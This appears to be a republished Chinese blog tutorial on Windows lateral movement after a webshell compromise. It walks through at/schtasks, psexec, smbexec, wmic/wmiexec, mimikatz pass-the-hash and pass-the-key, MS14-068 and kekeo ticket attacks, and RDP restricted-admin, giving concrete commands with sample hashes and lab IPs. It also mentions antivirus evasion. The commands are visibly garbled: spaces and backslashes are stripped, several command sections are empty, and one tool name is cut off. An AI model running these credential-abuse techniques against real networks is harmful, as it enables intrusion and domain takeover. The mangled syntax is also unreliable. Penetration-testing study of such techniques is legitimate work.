前言

當我們拿下 webshell 后，若其服務器有內網環境，在進一步測試中就需要進行內網滲透測試，對于內網滲透測試的方法常用的為：基于口令的橫向移動和基于漏洞的攻擊。本文主要從基于口令的橫向移動，自己收集了網上比較主流的方法，但是自己才疏學淺，有說法錯誤之處希望大佬們能夠在評論區中指出，感激不敬。

一、通過 at&schtasks 進行明文傳遞

說明：at&schtasks 都是 windows 上創建計劃任務的命令，只是針對的版本不同，at 是 win2008 及一下；

1、前提條件：

1）能夠獲得明文密碼

2）鏈接的目標主機需要administrator權限，普通權限不能夠進行文件操作（工作組或域）

3）跳板主機任意權限

4）可在本地和遠程執行

2、執行流程：

1）與目標主機建立IPC鏈接

2）拷貝要執行命令的腳本到目標主機

3）查看當前時間，創建計劃任務(at&schtasks)

4）刪除IPC鏈接

3、命令語句：（這里的命令語句在下面很多方法中都會有體現，所以下面若有用到該類似方法我將會簡寫）

二、、atexec 進行明文與HASH傳遞

1、前提條件：

1）能夠獲得明文密碼或密碼hash值

2）目標主機需要連接administrator用戶（工作組或域）

3）跳板主機任意權限

4）可在本地和遠程執行

2、命令語句：

三、SMB 服務利用

1、psexec 工具傳遞

說明：SMB 服務可以通過明文或 hash 傳遞進行攻擊，需要對方服務器 445 端口開放。psexec 工具有微軟官方自帶（不用考慮免殺），也有第三方制作（需要考慮免殺）。

前提條件：

1）能夠獲得明文密碼或密碼hash值(官方工具只能使用明文，第三方可以使用hash)

2）通過psexec工具的話只能在本地反彈shell，但是CS可以輔助我們使用psexec方法，遠程反彈會話

3）建立的連接需要連接administrator用戶，普通權限無法連接成功

4）跳板機任意權限

命令語句：

1）微軟官方工具，只能通過明文建立

2）第三方工具，可以通過 hash 值建立

3） 通過 CS 進行傳遞，該方法我會在后期說 CS 的時候體現出來，比較簡單，這里就不細說了

2、smbexec 工具傳遞

說明：該工具為第三方工具，在實際情況中需要考慮免殺請況，同時服務器需要開通 445 端口 前提條件：

1）能夠獲得明文密碼或密碼hash值(官方工具只能使用明文，第三方可以使用hash)

2）只能本地反彈shell，無法遠程反彈

3）建立的連接需要連接administrator用戶，普通權限無法連接成功

4）跳板機任意權限

命令語句：

四、WMI 服務利用

1、wmic 傳遞

說明：WMI 服務需要目標服務器開通 135 端口，同時需要目標服務器明文密碼，該方法不會在目標服務器中留下日志，但是沒有回顯

前提條件：

1）獲得明文密碼

2）可在本地和遠程執行

3）需要administrator用戶賬號，普通權限連接不成功

4）跳板機任意權限

命令語句：

1）wmic/node:192.168.89.3/user:administrator/password:123.comprocesscallcreate"cmd.exe/cnetuser>C:1.txt"#工作組

2）wmic/node:192.168.89.3/user:hackeradministrator/password:1qaz@2wsxprocesscallcreate"cmd.exe/cipconfig>C:1.txt"#域內

2、cscript 傳遞

說明：自帶的 cscript 為明文傳遞，有回顯，但是需要事先傳入 wmiexec.vbs 文件，需要目標服務器開啟 135 端口

前提條件：

1）獲得明文密碼

2）只能在本地執行

3）需要administrator用戶賬號，普通權限連接不成功

4）跳板機任意權限 命令語句：

1）cscript//nologowmiexec.vbs/shell192.168.89.3administrator123.com#工作組

2）cscript//nologowmiexec.vbs/shell192.168.89.3hackeradministrator123.com#域內

3、wmiexec 傳遞

說明：wmiexec 為第三方工具，需要注意免殺問題，也需要目標服務器開啟 135 端口

前提條件：

1）獲取明文密碼或hash值

2）只能在本地執行

3）需要administrator用戶賬號，普通權限連接不成功

4）跳板機任意權限 命令語句：

1）wmiexec.exe./administrator:123.com@192.168.89.3"whoami"#工作組明文

2）wmiexec.exehacker/administrator:123.com@192.168.89.3"whoami"#域內明文

3）wmiexec.exe-hashes:afffeba176210fad4628f0524bfe1942./administrator@192.168.89.3"whoami"#hash值

五、PTH 橫向傳遞攻擊

說明：PTH 攻擊建立在密碼 hash 之上。攻擊系統范圍為 win7win2008r2win2012 等。若系統打了 KB2871997 補丁只能 administrator 連接，沒有打補丁任何用戶都可以連接

前提條件：

1）獲取密碼hash

2）判斷是否打了補丁--KB2871997

3）跳板機權限為管理員權限

4）可以在本地和遠程執行

5）值得注意的是，普通用戶建立的連接，似乎權限過小，很多操作無法進行，所以我判斷普通用戶似乎是無效的

命令語句：

1）本地執行（基于 mimikatz 執行）

#基于mimikatz執行

1）sekurlsa::pth/user:sql2008/domain:hacker/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d#域內hash傳遞

2）sekurlsa::pth/user:administrator/domain:workgroup/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d#工作組hash

#彈出一個命令執行框，在這個框中建立了類似的ipc$連接，

#我們可以查看目錄，下載文件，上傳文件，創建計劃任務執行文件

#如：

dir\sql2008.hacker.comc$

dir\192.168.89.3c$

2）遠程執行（基于 CS 執行）

#基于CS執行

1）mimikatzsekurlsa::pth/user:administrator/domain:workgroup/ntlm:afffeba176210fad4628f0524bfe1942

2）steal_tokenPID

3）shelldir\192.168.89.3c$

六、PTK 橫向傳遞攻擊

說明：PTK 傳遞攻擊針對的是打了 KB2871997 補丁的，未打補丁是不能用的，這里需要使用 mimikatz 獲取 AES keys，獲取命令為：sekurlsa::ekeys

前提條件：

1）判斷是否打了KB2871997補丁

2）獲取AES密碼

3）跳板機的管理員權限

4）能在本地運行，遠程沒有測試成功 命令語句為：

1）mimikatz.exe"sekurlsa::ekeys"#獲取aes

2）sekurlsa::pth/user:sql2008/domain:hacker/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

七、PTT攻擊

1、說明：PTT 攻擊是利用 Kerberos 協議進行攻擊的，常用的攻擊手法有：MS14-068，Golden ticket，SILVER ticket。它是將連接合法的票據注入到內存中實現連接。 MS14-068 造成的危害是允許域內任何一個普通用戶，將自己提升至域管權限。微軟給出的補丁是 kb3011780

2、前提條件：

1）利用ms14-068、kekeo、本地票據在本地測試成功，

2）利用ms14-068、kekeo跳板機本地連接時可以是任意權限

3）利用ms14-068需要知道域內某用戶的賬號及明文密碼

4）kekeo需要知道域內用戶名與hash值

5）本地票據需要管理員權限（mimikatz導出票據需要高權限）

1）利用ms14-068遠程連接需要管理員權限

3、命令語句：

1）利用 ms14-068

#1）本地連接

1）WMICuseraccountgetname,sid#sid獲取，管理員權限獲取的更多一點

2）ms14-068.exe-u域成員名@域名-ssid(域成員)-d域控制器地址-p域成員密碼（生成TGT）

3）MS14-068.exe-uweb07@hacker.com-sS-1-5-21-2374949671-2603306159-227762320-1105-d192.168.89.2-p123@com

4）mimikatz.exe"kerberos::ptcTGT_mary@god.org.ccache"#（TGT票據注入）

5）dir\DC.hacker.comc$(注意要用域內域名連接，這里其實是類似建立了一條IPC$連接)

#2）遠程連接，在CS中執行

1）WMICuseraccountgetname,sid//sid獲取

2）mimikatzkerberos::list//列出當前票據

3）mimikatzkerberos::purge//清除票據

4）MS14-068.exe-uweb07@hacker.com-sS-1-5-21-2374949671-2603306159-227762320-1105-d192.168.89.2-p123@com//生成tgt票據

5）mimikatzkerberos::ptcTGT_web07@hacker.com.ccache//導入票據

6）shelldir\sql2008.hacker.com//利用

2）利用工具 kekeo（未成功）

1）ekeo"tgt::ask/user:mary/domain:god.org/ntlm:518b98ad4178a53695dc997aa02d455c"#生成票據

2）kerberos::pttTGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi#導入票據

4）dir\DC.hacker.comc$#利用

八、RDP 傳遞攻擊 （測試失?。?/p>

1、說明：RDP 傳遞其實就是利用了遠程桌面功能

2、前提條件：

1）獲得對方賬戶明文或hash（用戶需要是能夠有遠程桌面連接權限）

2）本地執行

3）跳板機任意權限

3、命令語句：

sekurlsa::pth/user:administrator/domain:hacker.com/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d"/run:mstsc.exe/restrictedadmin"

總結

上述方法自己在本地搭建了靶場進行測試，可能有很多外在因數是自己沒有考慮到的，所以可能會存在錯誤，歡迎各位大佬批評指正。

審核編輯：劉清